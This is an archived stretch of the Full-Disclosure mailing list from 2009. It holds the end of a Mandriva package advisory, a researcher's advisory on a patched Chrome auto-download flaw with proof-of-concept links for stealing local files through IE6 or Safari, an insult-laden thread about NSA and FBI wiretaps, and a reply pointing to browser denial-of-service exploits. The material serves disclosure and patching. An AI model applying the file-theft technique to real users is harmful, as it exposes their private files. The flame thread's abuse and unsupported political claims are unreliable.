 11c6c1317bebd5ac10a1853314d8ba27  2010.0/x86_64/firefox-tr-3.5.4-0.1mdv2010.0.x86_64.rpm
 8735da4c6601294c20d447f89f4b6ec0  2010.0/x86_64/firefox-uk-3.5.4-0.1mdv2010.0.x86_64.rpm
 7f9f35ffddcf6e4bf7fb47217f165868  2010.0/x86_64/firefox-zh_CN-3.5.4-0.1mdv2010.0.x86_64.rpm
 6713f99874dab2be6f10fec329f3a410  2010.0/x86_64/firefox-zh_TW-3.5.4-0.1mdv2010.0.x86_64.rpm
 166fb912d4a695c78395710733dbfbca  2010.0/x86_64/gnome-python-extras-2.25.3-10.1mdv2010.0.x86_64.rpm
 e0fd9a9e8e769d42c9cde670ae2005c0  2010.0/x86_64/gnome-python-gda-2.25.3-10.1mdv2010.0.x86_64.rpm
 b4a0ee777d65a3d741df0e50b82a5cdc  2010.0/x86_64/gnome-python-gda-devel-2.25.3-10.1mdv2010.0.x86_64.rpm
 71879d0fea2955a10ee71996b82a5efa  2010.0/x86_64/gnome-python-gdl-2.25.3-10.1mdv2010.0.x86_64.rpm
 5390f476ecbc6b8054a599e2c5a5e790  2010.0/x86_64/gnome-python-gtkhtml2-2.25.3-10.1mdv2010.0.x86_64.rpm
 02acb94939d4bdba1672ac27b090249b  2010.0/x86_64/gnome-python-gtkmozembed-2.25.3-10.1mdv2010.0.x86_64.rpm
 fb9bee1736af40eb3d3d36cc8f547df9  2010.0/x86_64/gnome-python-gtkspell-2.25.3-10.1mdv2010.0.x86_64.rpm
 01b1b3087fedc71a407e026db5227fed  2010.0/x86_64/google-gadgets-common-0.11.1-2.1mdv2010.0.x86_64.rpm
 9e322a7219dff02f0fed2f73275cfda2  2010.0/x86_64/google-gadgets-gtk-0.11.1-2.1mdv2010.0.x86_64.rpm
 0ca671c0bb45f7efeedf0961ef5b9f72  2010.0/x86_64/google-gadgets-qt-0.11.1-2.1mdv2010.0.x86_64.rpm
 db35b9e0859a21485aa2df192e6310e6  2010.0/x86_64/lib64ggadget1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 d21d90fa2cfa5b3e67bb5c49228576b9  2010.0/x86_64/lib64ggadget-dbus1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 7763769602d65367ce3de258bf0ec443  2010.0/x86_64/lib64ggadget-gtk1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 0a897420820ab2e760a36ed593a91039  2010.0/x86_64/lib64ggadget-js1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 82fb87d482a21a8ab47706a1e24e9cde  2010.0/x86_64/lib64ggadget-npapi1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 5bfc44160006ec5837416d54fdf2c9cf  2010.0/x86_64/lib64ggadget-qt1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 e83c7f97c3048aeca5169110cc388271  2010.0/x86_64/lib64ggadget-webkitjs0-0.11.1-2.1mdv2010.0.x86_64.rpm
 a3427fbe231df6ef7622acbfe4b46059  2010.0/x86_64/lib64ggadget-xdg1.0_0-0.11.1-2.1mdv2010.0.x86_64.rpm
 d15f31cccac4e82d1626dc03d0b3ab1c  2010.0/x86_64/lib64google-gadgets-devel-0.11.1-2.1mdv2010.0.x86_64.rpm
 06e07653747492e8d1ef87e7a067b862  2010.0/x86_64/lib64opensc2-0.11.9-1.1mdv2010.0.x86_64.rpm
 f4c206bf5d1e2eade49831a79fe48264  2010.0/x86_64/lib64opensc-devel-0.11.9-1.1mdv2010.0.x86_64.rpm
 2a2fa2b4bf67b7005d1cf2422bc9309d  2010.0/x86_64/lib64xulrunner1.9.1.4-1.9.1.4-0.1mdv2010.0.x86_64.rpm
 dfa65c7153daab784fbde2c127d1e8df  2010.0/x86_64/lib64xulrunner-devel-1.9.1.4-0.1mdv2010.0.x86_64.rpm
 4c77c1bb1496ad76a5d24f0eb137c648  2010.0/x86_64/mozilla-plugin-opensc-0.11.9-1.1mdv2010.0.x86_64.rpm
 375f4f52a6140af70c43117bcb0406d5  2010.0/x86_64/mozilla-thunderbird-beagle-0.3.9-19.1mdv2010.0.x86_64.rpm
 fcd76aa20c9963cd269b0de026e937b2  2010.0/x86_64/opensc-0.11.9-1.1mdv2010.0.x86_64.rpm
 bb088a24b343e47ce8c6756e0a57c37c  2010.0/x86_64/python-xpcom-1.9.1.4-0.1mdv2010.0.x86_64.rpm
 9ba9eca2c96f0c1e6423dd6af5119f15  2010.0/x86_64/xulrunner-1.9.1.4-0.1mdv2010.0.x86_64.rpm
 a55b9b5568e7618430c07a878e146c50  2010.0/x86_64/yelp-2.28.0-1.1mdv2010.0.x86_64.rpm 
 11002834e306ad2599e115787b57ece9  2010.0/SRPMS/beagle-0.3.9-19.1mdv2010.0.src.rpm
 f35067064a0c78edff8b036ca67774f3  2010.0/SRPMS/epiphany-2.28.1-1.1mdv2010.0.src.rpm
 bc04de1e6d7b2fd083a1206c4482fb7b  2010.0/SRPMS/epiphany-extensions-2.28.1-1.1mdv2010.0.src.rpm
 f0b0c517ec14c9d5e47647f9bf08fc78  2010.0/SRPMS/firefox-3.5.4-0.1mdv2010.0.src.rpm
 166554e926dcaab7ff2631817ee2b097  2010.0/SRPMS/firefox-ext-blogrovr-1.1.804-6.1mdv2010.0.src.rpm
 6432321af955bb76f1314dcf7598d4bd  2010.0/SRPMS/firefox-ext-foxmarks-2.7.2-2.1mdv2010.0.src.rpm
 0bfe93a46ccd200f974236740da44032  2010.0/SRPMS/firefox-ext-mozvoikko-1.0-6.1mdv2010.0.src.rpm
 912dabafc0eedd8374b77bf19863f8b4  2010.0/SRPMS/firefox-ext-plasmanotify-0.3.0-6.1mdv2010.0.src.rpm
 ef882f13ad9f95334e87b4e4d1d062c2  2010.0/SRPMS/firefox-ext-r-kiosk-0.7.2-9.1mdv2010.0.src.rpm
 8ecfa71225dd0500c8c4fdaaafe4fe22  2010.0/SRPMS/firefox-ext-scribefire-3.4.5-1.1mdv2010.0.src.rpm
 0df78b1b0f21b07d00706d72296490b3  2010.0/SRPMS/firefox-l10n-3.5.4-0.1mdv2010.0.src.rpm
 7a94ab5e7c21d73c1f8e074825fe93cd  2010.0/SRPMS/firefox-theme-kde4ff-0.14-18.1mdv2010.0.src.rpm
 a2906a74b07316a233c08eeaa09a827f  2010.0/SRPMS/gnome-python-extras-2.25.3-10.1mdv2010.0.src.rpm
 5ca44eee599e669d3936c2d8074dbdf1  2010.0/SRPMS/google-gadgets-0.11.1-2.1mdv2010.0.src.rpm
 3443a0354ae3c165243413cf2bd1a7dc  2010.0/SRPMS/opensc-0.11.9-1.1mdv2010.0.src.rpm
 e52f1e0b12809b71673467beef0e156f  2010.0/SRPMS/xulrunner-1.9.1.4-0.1mdv2010.0.src.rpm
 df7c1f2b4d6ee86a54319b934c717d39  2010.0/SRPMS/yelp-2.28.0-1.1mdv2010.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFK80jzmqjQ0CJFipgRAg3VAJ9fVUjPzaXLeDEqg8r7RSMPft/1BQCg5qgB
tbfeB4dua9AdXiQ1yMlumRA=
=OT9l
-----END PGP SIGNATURE-----


From Inferno at SecureThoughts.com  Fri Nov  6 00:47:37 2009
From: Inferno at SecureThoughts.com (Inferno)
Date: Thu, 5 Nov 2009 16:47:37 -0800
Subject: [Full-disclosure] Using Blended Browser Threats involving Chrome to
	steal files on your computer
Message-ID: <00c001ca5e7a$bd1b1450$37513cf0$@com>

For complete post with images, please visit
http://securethoughts.com/2009/11/using-blended-browser-threats-involving-ch
rome-to-steal-files-on-your-computer/

SECURETHOUGHTS.COM ADVISORY
=============================================
- CVE-ID		: CVE-2009-XXXX (Chrome) {Pending}
- Release Date	: November 05, 2009
- Severity		: Medium
- Discovered by	: Inferno
=============================================

I. TITLE
-------------------------
Using Blended Browser Threats involving Chrome to steal files on your
computer

II. VULNERABLE
-------------------------
Chrome all versions < 3.0.195.32
Tests performed on v3.0.195.25

III. BACKGROUND
-------------------------
Google Chrome is a web browser released by Google which uses the WebKit
layout engine and application framework. It is one of the four most popular
browsers in the market today. Google released the entire source code of
Chrome, including its bespoke V8 JavaScript engine as an open source project
entitled Chromium, in 2008. Google Chrome is best known for its fast speed,
simplicity and reliability.

IV. DESCRIPTION
-------------------------
Google Chrome has an inbuilt file downloader[1], just like every other
browser. However, the behavior of this function is different from other
browsers and provides users much more usability and convenience. Chrome
automatically downloads a file from any site that is passed using the
Content-Disposition header value "attachment" (on the contrary, all other
browsers show a save as dialog). There are some mitigations done by Chrome
to protect users from auto downloading malware by raising an alert on
executable extensions such as .exe, .htm, .jar, etc.

The vulnerability arises from the fact that there are other extensions such
as .svg, .mht, .mhtml that don't exist in the Chrome's malicious extension
blacklist and hence the user never gets a warning message before they are
auto downloaded to his or her computer. If these downloaded files are
clicked from the Chrome's download bar or Windows Explorer (which the user
is highely likely to click considering his or her trust in Chrome that it
warns for malicious extensions), they will automatically get opened in other
browsers and can be used to steal any file on the user's computer.

The reason for the name "Blended Browser Threats" is because here, Google
Chrome is used as a vehicle for attack, whereas the real vulnerability
executes inside other browsers such as IE6, Safari on your computer. The
vulnerability is not directly exploitable in IE6, Safari since an evil site
cannot automatically download content on your computer without your
permission. Another important point to note here is you might not be using
the browsers IE6, Safari and instead using Chrome. But clicking a particular
file on Chrome's download bar can make it automatically open in IE6, Safari.
See the proof of concept examples below.

V. PROOF OF CONCEPT
-------------------------
1. The MHT, MHTML (MIME HTML) file format is used by Internet Explorer to
embed all external resources, usually images, in a single document.
Basically, whenever you click "Save As" on a web page, this is the default
format used to save it. So, MHT, MHTML files gets automatically opened in IE
when clicked. The exploit I want to discuss is interesting in the context of
IE6 (estimated to be installed on roughly 25% of the computers). For other
newer versions like IE7, IE8, the user is explicitly prompted about the
danger of executing javascript and hence much harder to exploit.

An evil site opened inside Chrome can automatically download a MHT/MHTML
file to your computer. If the user clicks on this downloaded file from the
Chrome's download bar or opens this file through Windows Explorer, it gets
automatically opened in IE6. The malicious script executes and can be used
to send any of your local files to a remote evil destination. Ex: Click on
this link-

http://securethoughts.com/security/chromelocalfilexss/chromedownload.php?fna
me=WATCHMENAKED.mhtml
(Image)
 
2. The SVG(Scalable Vector Graphics) file is a registered extension in some
Safari versions and hence a SVG file gets automatically opened in Safari. If
you ever had an older version of Safari on your computer, this extension
will be most probably there in your registry. Hence, it does not matter what
your current version of Safari is (and you may very well be using the latest
version of Safari). So the exploit works like this:

An evil site opened inside Chrome can automatically download a SVG file to
your computer. If the user clicks on this downloaded file from the Chrome's
download bar or opens this file through Windows Explorer, it gets
automatically opened in Safari. The malicious script executes and can be
used to send any of your local files to a remote evil destination. Ex: Click
on this link-

http://securethoughts.com/security/chromelocalfilexss/chromedownload.php?fna
me=WATCHMENAKED.svg
(Image)
 
3. An evil site opened inside Chrome can automatically download
inappropriate content such as a por_ographic image to your computer. Ex:
Click on this link-

http://securethoughts.com/security/chromelocalfilexss/chromedownload.php?fna
me=WATCHMENAKED.jpg
(Image)
 

VI. FIX DESCRIPTION
-------------------------
Google Chrome Team fixed this vulnerability by appending these dangerous
extensions such as .mht, .mhtml, .svg, etc to already existing extension
blacklist.
Check out the fixes done in Chromium Source Code here [2,3].

Chrome Team is also actively looking how to improve this mechanism in the
long run, but because of the need to maintain compatibility with certain
existing uses, this needs to be done carefully.

VII. SOLUTION
-------------------------
Chrome: Upgrade to latest version of Google Chrome (v3.0.195.32 or higher).
If you remain connected to the internet, this should be automatic.

The more secure solution is to configure your browser to prompt you
explicitly before downloading any file type. This can be done by going to
Chrome Configuration Options -> Under the Hood -> Check the 'Ask where to
save each file before downloading' flag.

VIII. References
-------------------------
1. Downloads: Downloading a file - Google Chrome Help
http://www.google.com/support/chrome/bin/answer.py?hl=en&answer=95759

2. Google Chrome Code Fix 1
http://codereview.chromium.org/243115

3. Google Chrome Code Fix 2
http://codereview.chromium.org/261022

4. Interesting Reads - thanks to Michal.
(a) Security in Depth: Local Web Pages - Adam Barth
http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html

(b) Same-Origin Policy:Browser Security Handbook - Michal Zalewski
http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy

IX. CREDITS
-------------------------
This vulnerability is discovered by
Inferno (inferno {at} securethoughts {dot} com)

X. DISCLOSURE TIMELINE
-------------------------
Oct 5, 2009 12:14 AM: Vulnerability reported to Google Security Team.
Oct 6, 2009 11:19 AM: Automated Response from Google Security Team.
Oct 6, 2009 01:46 PM: First Status update provided by Michal Zalewski.
Vulnerability confirmed.
Oct 6, 2009 11:33 PM: Second Status update provided by Michal Zalewski. Code
Fix 1 checked in by Adam Barth.
Oct 8, 2009 12:30 AM: Code Fix 2 checked in by Adam Barth.
Nov 5, 2009 01:18 PM: Chrome v3.0.195.32 Released containing the Security
Patch.

I would like to thank Michal Zalewski and Adam Barth from Google for their
prompt responses and getting the patch ready in a timely manner. It was a
pleasure working with them. I am grateful to Google for providing credit for
my research by listing me on their "We Thank You" Page
(http://www.google.com/corporate/security.html).


From r0ck at operamail.com  Fri Nov  6 03:12:29 2009
From: r0ck at operamail.com (Chris)
Date: Thu, 5 Nov 2009 21:12:29 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
Message-ID: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>


> ----- Original Message -----
> From: "Paul Schmehl" <pschmehl_lists at tx.rr.com>
> To: "full-disclosure" <full-disclosure at lists.grok.org.uk>
> Subject: Re: [Full-disclosure] How Prosecutors Wiretap Wall Street
> Date: Wed, 04 Nov 2009 21:19:29 -0600
> 
> 
> --On November 4, 2009 8:03:10 PM -0600 "Gary E. Miller" <gem at rellim.com>
> wrote:
> 
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Yo Paul!
> >
> > On Wed, 4 Nov 2009, Paul Schmehl wrote:
> >
> >> Please cite one proven instance where surveillance was done on anyone
> >> without a FISA warrant - and lefty blogs filled with hyperbole don't
> >> count.
> >
> > Jewel v. NSA
> >
> 
> Yo Gary.  Look up alleged in a dictionary.  You won't find the word proven
> there.
> 
> I could sue the government for hiding space men at Area 51.  Until I can
> produce the evidence, it's vapor.

and someone could sue you for burying your head up your ass.  Fortunately, we have this list as proof.

Getting back on topic, it is well-known, and proven, that the NSA has surveillence facilities inside 
several U.S. telecom carriers.  You need only look inside one of AT&T's PoPs in San Francisco for proof.

Yes, the NSA might target non-citizens, however, without oversight, who is to know?  Don't mention FISA judges either.
They have become a rubber stamp for wiretap requests with an approval rate of well over 99.99%. 

The same applies to the NSLs issued by the FBI.  Not only are targets not permitted to talk about such NSLs, but they can't
even acknowledge the existance of such NSLs.  

And yet, here you are asking for the very proof that cannot be provided.

The only question I have for you is...

Which government agency is paying your mortgage?







-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze


From r0ck at operamail.com  Fri Nov  6 03:13:53 2009
From: r0ck at operamail.com (Chris)
Date: Thu, 5 Nov 2009 21:13:53 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
Message-ID: <20091106031354.05F6F7BD6E@ws5-10.us4.outblaze.com>

Why is it that Valdis has something to say about everything?

I see you on NANOG, full-disclosure, outages, and more.

> ----- Original Message -----
> From: Valdis.Kletnieks at vt.edu
> To: "Paul Schmehl" <pschmehl_lists at tx.rr.com>
> Cc: "full-disclosure" <full-disclosure at lists.grok.org.uk>
> Subject: Re: [Full-disclosure] How Prosecutors Wiretap Wall Street
> Date: Tue, 03 Nov 2009 23:52:28 -0500
> 
> 
> On Tue, 03 Nov 2009 22:13:24 CST, Paul Schmehl said:
> > Of course, without a warrant they can't wiretap anything.  
> > Furthermore every warrant to wiretap has to be accompanied by 
> > evidence that justifies the warrant and signed by a federal judge 
> > who agrees that there is sufficient cause for the wiretap, and 
> > illegal wiretaps will not only get your case thrown out of court 
> > but your butt thrown in jail as well.
> 
> You're new here, aren't you? :)
> 
> We're talking here about the FBI, which has had problems with their abuse
> of surveillance from J Edgar Hoover's early years up to the recent problems
> with abuses of NSLs.  And you expect us to believe they'll toe the line
> when using this surveillance ability?
> 
> Oh, and how much time did J Edgar spend in jail for his illegal wiretaps?
> And how much time will anybody spend in jail for the NSL abuses?
> << 1.2.dat >>
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

>







-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze


From pschmehl_lists at tx.rr.com  Fri Nov  6 03:47:41 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Thu, 05 Nov 2009 21:47:41 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
Message-ID: <45ABF1F940775FBE91A6CD44@Macintosh-2.local>

--On November 5, 2009 9:12:29 PM -0600 Chris <r0ck at operamail.com> wrote:
>
>
> and someone could sue you for burying your head up your ass.
> Fortunately, we have this list as proof.
>

Oh my, aren't we clever.

> Getting back on topic, it is well-known, and proven, that the NSA has
> surveillence facilities inside  several U.S. telecom carriers.  You need
> only look inside one of AT&T's PoPs in San Francisco for proof.
>

You know this to be true because you've looked for yourself, right?  You 
didn't just take the world of a complete stranger quoted by a compliant 
press at face value, did you?

> Yes, the NSA might target non-citizens, however, without oversight, who
> is to know?  Don't mention FISA judges either. They have become a rubber
> stamp for wiretap requests with an approval rate of well over 99.99%.
>

Sure, because we all know those rat bastards at the NSA and all those 
federal judges don't give a shit about the USA or freedom or personal 
rights.

When you forget that the people who work in government are just like you, 
trying to make a living and do the best they can, it's easy to 
depersonalize them and demonize them as if they're all blackhearted evil 
turds.  Easy, that is, if you don't have much of a brain.

> The same applies to the NSLs issued by the FBI.  Not only are targets
> not permitted to talk about such NSLs, but they can't even acknowledge
> the existance of such NSLs.
>
> And yet, here you are asking for the very proof that cannot be provided.
>

That's hilarious.  The surveillance program didn't even survive for four 
years after 9/11 before someone inside the NSA "blew the whistle" on the 
program.  Of course, even though they were working for those evil bastards 
somehow their altruism got the better of them and they revealed "the 
truth" about the program, despite the fact that they had sworn an oath to 
keep it a secret.  (And I'm sure they didn't get a dime for blabbing 
either!)

And of course Congress knew nothing about it, even though they had been 
briefed about it dozens of times and never raised a single objection.

Then of course, once the program had been "revealed" publicly, all those 
altruistic politicians immediately began investigating because they care 
so deeply about your privacy and your personal freedoms.  And then all the 
privacy experts, motivated by the purest of concerns, your personal 
privacy and freedoms, immediately sprung into action to protect you 
because they all care so deeply for you personally.

Or maybe, just maybe, there was the ever-so-slightest twinge of politics 
involved.

Of course we all know that Joe Wilson told the truth and George Bush lied. 
That should be obvious to any rational person, right?

But we'll never know for sure if the "whistleblowers" were motivated by 
something other than altruism, because you're so deeply concerned about 
your personal privacy and freedom that it would never even occur to you to 
question the motives of anyone who agrees with your view of the world.

The fact that you believe that only those who violate their oath of office 
are honest and only those who never violate their oath of office are 
dishonest blinds you to the possibility that the truth lies somewhere in 
between.  It's OK though.  So long as you don't apply that standard to 
your investments, you'll probably be able to retire OK.

> The only question I have for you is...
>
> Which government agency is paying your mortgage?

The same one that is proposing to pay for your healthcare and control 
every other aspect of your life because you're too blind to see the forest 
for the trees.  You and millions of other blithering idiots who see 
nothing wrong with the government forcing you to buy insurance but 
everything wrong with them trying to keep terrorists from blowing your 
worthless ass up.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From ivanhec at gmail.com  Fri Nov  6 03:53:54 2009
From: ivanhec at gmail.com (Ivan .)
Date: Fri, 6 Nov 2009 14:53:54 +1100
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <45ABF1F940775FBE91A6CD44@Macintosh-2.local>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
Message-ID: <6450e99d0911051953t41c3e913nebc74390d097e186@mail.gmail.com>

some background

http://www.wired.com/dangerroom/2009/03/breaking-cyber/
http://news.cnet.com/8301-13578_3-10046097-38.html
http://www.wired.com/threatlevel/2008/06/senate-debates/
http://www.lawandsecurity.org/publications/ForTheRecord/NSA_jan_07.pdf

and the list goes on....

ahh the land of the free.....

On Fri, Nov 6, 2009 at 2:47 PM, Paul Schmehl <pschmehl_lists at tx.rr.com>wrote:

> --On November 5, 2009 9:12:29 PM -0600 Chris <r0ck at operamail.com> wrote:
> >
> >
> > and someone could sue you for burying your head up your ass.
> > Fortunately, we have this list as proof.
> >
>
> Oh my, aren't we clever.
>
> > Getting back on topic, it is well-known, and proven, that the NSA has
> > surveillence facilities inside  several U.S. telecom carriers.  You need
> > only look inside one of AT&T's PoPs in San Francisco for proof.
> >
>
> You know this to be true because you've looked for yourself, right?  You
> didn't just take the world of a complete stranger quoted by a compliant
> press at face value, did you?
>
> > Yes, the NSA might target non-citizens, however, without oversight, who
> > is to know?  Don't mention FISA judges either. They have become a rubber
> > stamp for wiretap requests with an approval rate of well over 99.99%.
> >
>
> Sure, because we all know those rat bastards at the NSA and all those
> federal judges don't give a shit about the USA or freedom or personal
> rights.
>
> When you forget that the people who work in government are just like you,
> trying to make a living and do the best they can, it's easy to
> depersonalize them and demonize them as if they're all blackhearted evil
> turds.  Easy, that is, if you don't have much of a brain.
>
> > The same applies to the NSLs issued by the FBI.  Not only are targets
> > not permitted to talk about such NSLs, but they can't even acknowledge
> > the existance of such NSLs.
> >
> > And yet, here you are asking for the very proof that cannot be provided.
> >
>
> That's hilarious.  The surveillance program didn't even survive for four
> years after 9/11 before someone inside the NSA "blew the whistle" on the
> program.  Of course, even though they were working for those evil bastards
> somehow their altruism got the better of them and they revealed "the
> truth" about the program, despite the fact that they had sworn an oath to
> keep it a secret.  (And I'm sure they didn't get a dime for blabbing
> either!)
>
> And of course Congress knew nothing about it, even though they had been
> briefed about it dozens of times and never raised a single objection.
>
> Then of course, once the program had been "revealed" publicly, all those
> altruistic politicians immediately began investigating because they care
> so deeply about your privacy and your personal freedoms.  And then all the
> privacy experts, motivated by the purest of concerns, your personal
> privacy and freedoms, immediately sprung into action to protect you
> because they all care so deeply for you personally.
>
> Or maybe, just maybe, there was the ever-so-slightest twinge of politics
> involved.
>
> Of course we all know that Joe Wilson told the truth and George Bush lied.
> That should be obvious to any rational person, right?
>
> But we'll never know for sure if the "whistleblowers" were motivated by
> something other than altruism, because you're so deeply concerned about
> your personal privacy and freedom that it would never even occur to you to
> question the motives of anyone who agrees with your view of the world.
>
> The fact that you believe that only those who violate their oath of office
> are honest and only those who never violate their oath of office are
> dishonest blinds you to the possibility that the truth lies somewhere in
> between.  It's OK though.  So long as you don't apply that standard to
> your investments, you'll probably be able to retire OK.
>
> > The only question I have for you is...
> >
> > Which government agency is paying your mortgage?
>
> The same one that is proposing to pay for your healthcare and control
> every other aspect of your life because you're too blind to see the forest
> for the trees.  You and millions of other blithering idiots who see
> nothing wrong with the government forcing you to buy insurance but
> everything wrong with them trying to keep terrorists from blowing your
> worthless ass up.
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> ******************************************
> WARNING: Check the headers before replying
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/b8a82e89/attachment.html 

From r0ck at operamail.com  Fri Nov  6 04:03:31 2009
From: r0ck at operamail.com (Chris)
Date: Thu, 5 Nov 2009 22:03:31 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
Message-ID: <20091106040331.3F9BD7BD6E@ws5-10.us4.outblaze.com>


> ----- Original Message -----
> From: "Paul Schmehl" <pschmehl_lists at tx.rr.com>
> To: "full-disclosure" <full-disclosure at lists.grok.org.uk>
> Subject: Re: [Full-disclosure] How Prosecutors Wiretap Wall Street
> Date: Thu, 05 Nov 2009 21:47:41 -0600
> 
> 
> --On November 5, 2009 9:12:29 PM -0600 Chris <r0ck at operamail.com> wrote:
> >
> >
> > Getting back on topic, it is well-known, and proven, that the NSA has
> > surveillence facilities inside  several U.S. telecom carriers.  You need
> > only look inside one of AT&T's PoPs in San Francisco for proof.
> >
> 
> You know this to be true because you've looked for yourself, right?  You
> didn't just take the world of a complete stranger quoted by a compliant
> press at face value, did you?

The pictures were good enough.

> > Yes, the NSA might target non-citizens, however, without oversight, who
> > is to know?  Don't mention FISA judges either. They have become a rubber
> > stamp for wiretap requests with an approval rate of well over 99.99%.
> >
> 
> Sure, because we all know those rat bastards at the NSA and all those
> federal judges don't give a shit about the USA or freedom or personal
> rights.

What do you say to the 99.99% approval rate?  Are the FBI and other enforcement agencies just that good or is there a rubber stamp at work here?
 
> When you forget that the people who work in government are just like you,
> trying to make a living and do the best they can, it's easy to
> depersonalize them and demonize them as if they're all blackhearted evil
> turds.  Easy, that is, if you don't have much of a brain.

What an idealistic view.  How quant.  I suppose you believe in truth, justice, and the American way as well.  This is 2009.  Wake up, Paul.  The government is about one thing -- staying in existence.  Given your stance on other topics, I'm surprised you don't realize this.
 
> > The same applies to the NSLs issued by the FBI.  Not only are targets
> > not permitted to talk about such NSLs, but they can't even acknowledge
> > the existance of such NSLs.
> >
> > And yet, here you are asking for the very proof that cannot be provided.
> >
> 
> That's hilarious.  The surveillance program didn't even survive for four
> years after 9/11 before someone inside the NSA "blew the whistle" on the
> program.  (snip off-topic ranting)

We aren't talking about the NSA.  Try to keep up.  The NSLs are issued by the FBI.

> And of course Congress knew nothing about it, even though they had been
> briefed about it dozens of times and never raised a single objection.

No question they dropped the ball.  Am only surprised that you didn't expect as much.

(snip more off-topic diversionary BS)

> Of course we all know that Joe Wilson told the truth and George Bush lied.
> That should be obvious to any rational person, right?

Nobody mentioned George W Bush.  Oh wait...you did.  Why is that?

> But we'll never know for sure if the "whistleblowers" were motivated by
> something other than altruism, because you're so deeply concerned about
> your personal privacy and freedom that it would never even occur to you to
> question the motives of anyone who agrees with your view of the world.

This isn't about me, Paul.  Despite your attempt to divert the discussion.

> The fact that you believe that only those who violate their oath of office
> are honest and only those who never violate their oath of office are
> dishonest blinds you to the possibility that the truth lies somewhere in
> between.  

Wow.  How did you pull that fact out of your ass?  Nobody mentioned violating their oaths of office...except you.  more diversionary bullshit.

> > The only question I have for you is...
> >
> > Which government agency is paying your mortgage?
> 
> The same one that is proposing to pay for your healthcare and control
> every other aspect of your life because you're too blind to see the forest
> for the trees.  

I, along with my employer, pay for my health care.  That's another thing you're wrong about.


-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze


From r0ck at operamail.com  Fri Nov  6 04:07:16 2009
From: r0ck at operamail.com (Chris)
Date: Thu, 5 Nov 2009 22:07:16 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
Message-ID: <20091106040716.C5763CBEAB@ws5-11.us4.outblaze.com>


Don't bother.  Paul couldn't see the obvious if someone whacked him in the head with it.  An artifact from the 1950s era where government can do no wrong.  He needs to see everything for himself to believe it.  Of course, that means that Paul probably believes the world is flat, that the Sun revolves around the Earth, and that we were born about 6000yrs ago...

Paul, someone should put you on display in the Smithsonian.



-- 
_______________________________________________
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze


From mustlive at websecurity.com.ua  Thu Nov  5 21:54:11 2009
From: mustlive at websecurity.com.ua (MustLive)
Date: Thu, 5 Nov 2009 23:54:11 +0200
Subject: [Full-disclosure] Dark side of bookmarks
References: <20DE79EA3783484A94EF626CFBEB95B305DA7086CC@rivendell.cc.w2k.vt.edu>
Message-ID: <004b01ca5e62$9d138ab0$010000c0@ml>

Hello Aras!

As correctly note S/U/N
(http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071323.html)
I wrote enough PoCs (for different browsers) at my site
(http://websecurity.com.ua/2454/), and this page can be read via Google
Translate. But Aras and S/U/N, even without reading that page with Google
Translate, but just with going by link (in my article) to that page and view
PoCs (exploits) codes, it'll be enough to see how such attacks works.

> Your "article", unless I misunderstood, is useless.

Thanks for critic. Even lame critic is still critic :-). It's lame, because
on some of your questions there were already answers in my article. You just
read it not so attentive.

> To explain further, your article lacks substance. For instance you state:
> "could be used in DoS attack for browsers" yet you provide no working
> PoC/example(s)

In my article, just in words "DoS attacks on browsers", there is a link to
my post (http://websecurity.com.ua/2454/) about DoS vulnerabilities in
Firefox, Internet Explorer and Opera with PoCs (exploits) for all these
browsers. Which I posted 19.09.2008. So everyone can read this post and see
these exploits during this time as many times as he need. This post with
these vulnerabilities in different browsers was a part of my last year
project Day of bugs in browsers (http://websecurity.com.ua/2453/). And as I
mentioned above (as also mentioned by S/U/N) this post can be translated to
English via Google Translate.

> What about mitigation? What about prevention?
